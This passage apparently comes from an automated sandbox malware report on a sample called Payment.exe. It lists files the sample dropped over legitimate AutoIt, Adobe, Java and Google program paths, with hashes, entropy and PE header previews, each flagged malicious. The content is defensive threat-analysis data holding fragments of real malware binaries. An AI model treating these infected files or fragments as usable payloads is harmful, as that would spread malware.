Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.\|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@..........................`&.....%,......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...\|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc.......`.......r..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1682944
Entropy (8bit):	4.3248333884090755
Encrypted:	false
SSDEEP:	12288:tiEhwdbTLV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:ZKdHBVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	4C1D33654EF089BD0F582EE18EEB8543
SHA1:	B4100D5803FA49E715D23E09DBB1C50E2E4761C9
SHA-256:	C5473E8E3198D2BA3CDAC89AF636F4BCB1B88E3130636D1D329CBDBA1AFDC979
SHA-512:	4B433C76F1237E53694953BE685EB14B54C199D82682276E2684218A4DDF96D551956EF1920AFFBFB2E6E6E72B3C995A0C1E541396E5BD61C1B0E833721393EE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@..............................&......R.... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc..............................@...................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2203136
Entropy (8bit):	7.646518905093195
Encrypted:	false
SSDEEP:	49152:JK0eqkSR7Xgo4TiRPnLWvJTgFIDRRAubt5M:JK0pR7Xn4TiRCvJkUf
MD5:	866B0D30E50ACD65EF8DCC8A6AF42A43
SHA1:	0A05CEEE310D5CBC0108218AF8C7AE720EFB89A0
SHA-256:	FCF0A7D66EBEBA6CD3F41A61DE619C22F111D264BC8900C2F30AF33364DFCBC1
SHA-512:	D80876168781F9B6E1300DA872CB87C08B2C673B03F4E5AD418EDC44F012BB2D74B4B020C006D02756798B2F9AF8BCD22D42C1B95C29760072A88EBF0E13BD6D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......."..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2369024
Entropy (8bit):	7.564157779799397
Encrypted:	false
SSDEEP:	49152:1fYP1JsEDkSR7Xgo4TiRPnLWvJTgFIDRRAubt5M:lYPBR7Xn4TiRCvJkUf
MD5:	E16DFF32C8D52DA1A4F8D2F29C4E0486
SHA1:	7AB9A7ECA703F04278BE13A8C44D329CB9F3CFEB
SHA-256:	465818464FFA9A646A4A2B0A2653E561FA29C45ECA6C23AA5BABE84D74005052
SHA-512:	9AC13F3CCE5F5D5F31A0A5D927EB0621A8735A99FC0E2B65D436152DF269EC4042BD0724422B090A41EFBE0D4E3750891366CE55F8EFBB6AB7355C471FC49D87
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....\|......}.a...p..i...p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.....;.$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1613824
Entropy (8bit):	4.154564404266869
Encrypted:	false
SSDEEP:	24576:ZYUckn3Vg9N9JMlDlfjRiVuVsWt5MJMs:ZZcknlgFIDRRAubt5M
MD5:	95015C9338A9AD63CE23D9ED592647F9
SHA1:	D02C5D0853C58FE212B608CEE49F1F302658ACE9
SHA-256:	E31D1B1AB0208810B1FE3C2846472AD2D6290B9B7164BFB2EB424863610E3668
SHA-512:	C314045059C9E0B50B02AD3D3B7C5C6CA97972816BC93733AFBBFC0D431B0A01B596AC362ED815ED302D5112C5A02FD56703FACBFD29A0B5F97EE4C05687A605
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................................................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1640448
Entropy (8bit):	7.1655174687843175
Encrypted:	false
SSDEEP:	49152:Z+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSPgFIDRRAubt5M:DSktbpiUf
MD5:	341FDF5A81771F266F0AD0BB9F2CDFAF
SHA1:	B7599EB8FFC197C9CDEB601B9FDAF52D1A45A515
SHA-256:	25DCF8ADBAEADAC5064F9EE92C39D6313025CE6BC7690F1BB023F48BE15098C2
SHA-512:	9FFC69C4A040C223B947956403D6180CB07B5865C639C6EBA2894F9457AF02BEA03B37DBA89CD86E3D4543C5559BD5AC517463581D8FB46F0041976A73081961
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................?;.... ...@...............@..............................l..\|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..\|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2953728
Entropy (8bit):	7.092804437708469
Encrypted:	false
SSDEEP:	49152:PGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxL+gFIDRRAubt5M:X4OEtwiICvYMRffUf
MD5:	C4B84B9E0E064E8C9349669F42B33CE1
SHA1:	5228E1AD9086D9C175FDE739816D7EB6712F9D91
SHA-256:	455766EBCC4E9A9A7A6F7C44D0B0DD18F2E870B10DBD7EF6825177041BF1A611
SHA-512:	B53C1B22A083F328D0E0A3FF06678D5BA02BC6D1DE43189C1D486AEABF5F51705DAA4E0206A9F66A8D5848EEF3CC958CA3872C7CB24B131499876D8161FBA3F3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1854464
Entropy (8bit):	4.613160385518719
Encrypted:	false
SSDEEP:	24576:KAMzR+3kMbVjhdVg9N9JMlDlfjRiVuVsWt5MJMs:no+lbVjh3gFIDRRAubt5M
MD5:	DE211EFFCAB1891C991DAC1D852CC9CB
SHA1:	16513974E7EB65757AA8DE9390EE2CBA27184E27
SHA-256:	AF19CD15C0682C2592B79C02AAFB76D660D0CE9AF83C11F7BFA7ECA2345239B9
SHA-512:	F31DA278D646A023B8F3440C2792B0D809D3C90BC5D39716996678615887866CF7576420F4F5570D1AF192D60AB9D1804CD947C40841E954A5D1D987726F9F2D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc... ...........<..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1658880
Entropy (8bit):	4.313003744288918
Encrypted:	false
SSDEEP:	24576:WxGBcmlZVg9N9JMlDlfjRiVuVsWt5MJMs:uGy+jgFIDRRAubt5M
MD5:	F5BCBACCEA71830B4ADA5AACE7DD6009
SHA1:	26DC56616B63CB3A5535386D599FEE62C786E0F5
SHA-256:	86C108B5F79609590966DF29369DA13D359FB06640C96469739876778BA9A6B0
SHA-512:	58EB3CC5015FDD60E1D523651452BD2104146D675C4824C31EC1665B350C272DA3606B0B510AACC953ED58CEB1F6B9948878A93BF364DB8F48B71B2D562E5403
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................$9......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2013184
Entropy (8bit):	4.862719255395332
Encrypted:	false
SSDEEP:	24576:v0vHykLj8trn3wsHVg9N9JMlDlfjRiVuVsWt5MJMs:qHj4rgs1gFIDRRAubt5M
MD5:	9F671E3EE0B79BB62E0926BEAECBA602
SHA1:	210B128D74FD22D2B54A3A4DA2ACD3356B973A5A
SHA-256:	B06FD8249E5B4616D64FD3549B94D2CF4481166064CC4B19CEF7280A460DBCD4
SHA-512:	3938A6C487ABD03B44B808F348FC944D5657B5C1E8C577949495A83C31E34EF9BEF426EC6D0AAE02B582CD50CAB50D8770B33A21FFA1CD90E37556F5A0894222
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..................................K......................................<........P...\|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....\|...P...~..................@..@.reloc...0....... ..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1781760
Entropy (8bit):	7.278449995347671
Encrypted:	false
SSDEEP:	49152:H4i0wGJra0uAUfkVy7/ZOgFIDRRAubt5M:HN0wGJrakUQy1Uf
MD5:	7215C048CA1D40130706C73C21401CA1
SHA1:	10195D66C0F3556B1753366655BC70A586C1023F
SHA-256:	AC7B0CB9BCB1F646394DC2627769800638803F3E1A70F10DE2420AAE44363FBE
SHA-512:	62768024580643428989AD26B718A6EEC0D8A554F275A9416F3A8F1E8B5158EC2F8D7CCF57B9D2BC6211CBB6B5F68846A68B2E536029E0FB7D985F30678FA44F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1318400
Entropy (8bit):	7.447821142203832
Encrypted:	false
SSDEEP:	24576:UeR0gB6axoCf0R6RLQRF/TzJqe58BimFVg9N9JMlDlfjRiVuVsWt5MJMs:ggHxmR6uBTzge5MimfgFIDRRAubt5M
MD5:	5D7B0BEC6D8D546407F1B7F01CBBD2BE
SHA1:	6777788057F55677C559BBAC0B3A3A2AF756C368
SHA-256:	ECE834E33FC4CFCB15C063FAFFB918348A3BB5B3A8DF57EADAD06CE4DCFE0E5A
SHA-512:	E275C5911F818E0348C50A6E749B359BD6C8E535881A50F5FDC56AA0DD57F48630356DBE81D2CE1E9B9A6245F4A9B14C504E5421DFB28E2AD45D1B5FBCA9844F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`....../.......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1743872
Entropy (8bit):	4.508040806610014
Encrypted:	false
SSDEEP:	24576:uKwOtO7XVg9N9JMlDlfjRiVuVsWt5MJMs:uzOtmFgFIDRRAubt5M
MD5:	B1D2B0072D72EBC434D21501E915B8FB
SHA1:	40265D90F46AB096217E5C544EB5F1D2D3002614
SHA-256:	6F2F45E112E28BD50E10D0CDA5AA295B531D69100ADE9A0D964507C02633A4C7
SHA-512:	BF151CE97F8983CC379FFD494427A8D63F7D3921C9B5041D883F7E70F836DF74907AA82CCC314465CF7263159B4FFC5A7BB2C938DBD734724D6B87A398F33A7F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................................................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1743872
Entropy (8bit):	4.50868016807321
Encrypted:	false
SSDEEP:	24576:SZU/h/4KkVg9N9JMlDlfjRiVuVsWt5MJMs:SG/VkgFIDRRAubt5M
MD5:	5001126C3400D8825AD6ECAB13167EEB
SHA1:	9953D030FFC67D4101092F449F376D0E758645D0
SHA-256:	A9D572B01FA8A27F0CCE70F59D928F8AAB9FD45268EBA5CD72685C2A9BD18021
SHA-512:	D6B230CBFEE41A39099D7919DD26DACF56A039DF22F44B34075CE6F717005F7A1E1FC97CF0217E5323D5900F047946A6F4F8CB08BCE02B714FEE1EDED9F9AD8B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@.................................I........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1882624
Entropy (8bit):	4.614349905118474
Encrypted:	false
SSDEEP:	24576:0x73iBLZ05jNTmJWEx7Vg9N9JMlDlfjRiVuVsWt5MJMs:0xDiHIjNgpgFIDRRAubt5M
MD5:	5809D5DC34585842A01FAB0B61F656ED
SHA1:	97AB08FAEB585C685D7550281C3ED7BEFAFEA226
SHA-256:	BE5BA2D926CB50541B9901F4F4044A37C3A39250E399D7F88F852E5CB6800080
SHA-512:	28921DCBE26A763B8BFC54A9CEB66B52BDE7C9FC32D96F063AC4640AE73026EB0F4EEE85FBC530307397832D7AD2A0FDE6A4E3C6DCB828D84E22D327F22EF909
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................@......#...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6313984
Entropy (8bit):	6.933942374741138
Encrypted:	false
SSDEEP:	196608:qd/eb1j56ibMMsA8YzOIWwa8NZp79k6e6pVxSUf:qd/eb1j0i41YzOu3NZp7O6e6pV8Uf
MD5:	BCB01B519F651F3402CBE86483789595
SHA1:	5B7B9FFA3B6B3B330ADFB48E0576BD475529E49C
SHA-256:	9CC134C262B9E6DD7F8AAFE67ADC660ADB8D0E1BB7C9B2848338E0FEE27B7B6F
SHA-512:	A9611F3FB9F22013431BA3BB7A602F7AFD309C4015B44CE91F2653316CE01C5D2F6E9CC8DE94F0E12CB1BEC6C3FD777F468FF625E796A20DF5B5BFE05EC8E6E7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...1X.g..........".......@..P.......k#...........@...........................b......,a.............................{.J.P....J.......M.............................-J......................*J......A@.............$.J......J.@....................text....-@.......@................. ..`.rdata..P....@@......2@.............@..@.data....^....J.......J.............@....tls....y....PM.......K.............@...CPADinfo(....`M.......K.............@...malloc_h.....pM.......K............. ..`.rsrc........M.......K.............@..@.reloc....... W.......U.............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1526784
Entropy (8bit):	4.0498654035126425
Encrypted:	false
SSDEEP:	12288:81V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:83Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	4FCF1F044F417FB2186DD8019990BCFD
SHA1:	FA15B74B1AAD7421E87E92FF1C3AA447EAE2C08D
SHA-256:	925F4918A7FCBBC4EC086FE766E8FB4BE9BF574CC1D73557B4C148C1760781F2
SHA-512:	2C578A51F7B5A9A932AD2FF97D5578D14DF0C39F73D08CB16B0BD0A98ADA5CE487E98C4E53CC7FA4DBF8B15423C6DCCF2CDD6B8B3A7E6A6F6DA602161AF884D7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................F.......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...............l..............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1510912
Entropy (8bit):	4.009212759497924
Encrypted:	false
SSDEEP:	12288:SMuV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:5OVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	B912A468EBD14E7A11242907B47533D4
SHA1:	63659933DFBABFEAB6C5DDEEF81A3BE02EF54A9A
SHA-256:	6FB983E94BE117F85948793E04B8FBDEFF171B8B76DBE8D3165AC412427E5230
SHA-512:	52AAFE3BC15E1D886449AD15651EBFD5EF6D012A91F6A70DD190EC525618DF63048975AA0D6DAAA32173FC28C1E9434628371036A06602FBF218BE0EE96E85DC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................@..............................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1743872
Entropy (8bit):	4.508048485279185
Encrypted:	false
SSDEEP:	24576:7KwOtO7XVg9N9JMlDlfjRiVuVsWt5MJMs:7zOtmFgFIDRRAubt5M
MD5:	DC000539382A3D24E2E7F055C97F1DAE
SHA1:	C125E10645D0B7A204F48861DE6062D41AC96425
SHA-256:	CD6F05BD557740AF386CE9943CB0FC7A5C1A2B1298BABFC7DDB04FD4B19223B4
SHA-512:	6B9C20A91F2066504B575D64FE2D53C0982BB7DE059DF009E5A01C7A48ECDFF74F2E551CD48A51195DEFD0D706AA2877D19B58D7C117C693B8497C9E6A07B84E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@.................................3........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1581056
Entropy (8bit):	4.1306546943289835
Encrypted:	false
SSDEEP:	12288:QY1vvCV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:P16Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	DC3FB50F6BD80D0EEF8C83803E909507
SHA1:	F55C32760D7F2E9F237CEBCDEFC422C869529DDE
SHA-256:	5E5CD35202ADE73B720DA23C78EA3F521EAB0122BE79ABE3DF996A06B9D1201A
SHA-512:	57F02AF90C0E67960E0ADDB4A77B46D814DBB207408ADB9AF29429C462AF7B7965A72E5688DC525A1E119854C28A30126907380F616963EA2FD54EA9C6621E87
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..........................`..............................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc.......p.......@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1743872
Entropy (8bit):	4.50867561586425
Encrypted:	false
SSDEEP:	24576:kZU/h/4KkVg9N9JMlDlfjRiVuVsWt5MJMs:kG/VkgFIDRRAubt5M
MD5:	549239814725C37CA9DE3B635AD22D50
SHA1:	5A2FE662C10847BA875D19983950275E8D49BCBC
SHA-256:	D7DA762008611BBDEE142B0E54CD5770A45CF642C765BD648F6562E28079922A
SHA-512:	630CA84B562FD1A3D8A45F842DD468E7B22FCF4030DC353D7EED6768032B905FFC9E2EE044EBCF0F6036F03AEB74327F95DC0BCB19ABEC8BBE39FEBAE2470AC3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................................................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1882624
Entropy (8bit):	4.61434500466364
Encrypted:	false
SSDEEP:	24576:Tx73iBLZ05jNTmJWEx7Vg9N9JMlDlfjRiVuVsWt5MJMs:TxDiHIjNgpgFIDRRAubt5M
MD5:	6BDE89ED84768A711DF7D2E67E38C9C1
SHA1:	255C265394B09C9291AEA0B7A4A1EFDFF64F3C57
SHA-256:	8DB25A66A2C4BBDCEF97BAEB5A40DF069710116509611F7364D6E873AE821F12
